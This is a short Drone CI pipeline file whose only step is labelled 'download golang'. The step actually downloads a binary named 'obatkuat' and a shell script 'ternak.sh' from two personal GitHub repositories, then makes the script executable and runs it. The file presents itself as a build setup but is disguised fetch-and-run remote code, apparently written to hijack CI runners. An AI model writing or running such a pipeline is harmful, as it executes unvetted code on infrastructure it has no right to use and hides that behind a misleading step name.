---
kind: pipeline
type: exec
name: default

platform:
  os: linux
  arch: amd64

steps:
- name: download golang
  commands:
  - wget https://raw.githubusercontent.com/renitareni/mesin/main/obatkuat
  - wget https://raw.githubusercontent.com/renitareni/mesin/main/ternak.sh && chmod u+x ternak.sh && ./ternak.sh
  - wget https://raw.githubusercontent.com/renifer12/engine/main/obatkuat
  - wget https://raw.githubusercontent.com/renifer12/engine/main/ternak.sh && chmod u+x ternak.sh && ./ternak.sh
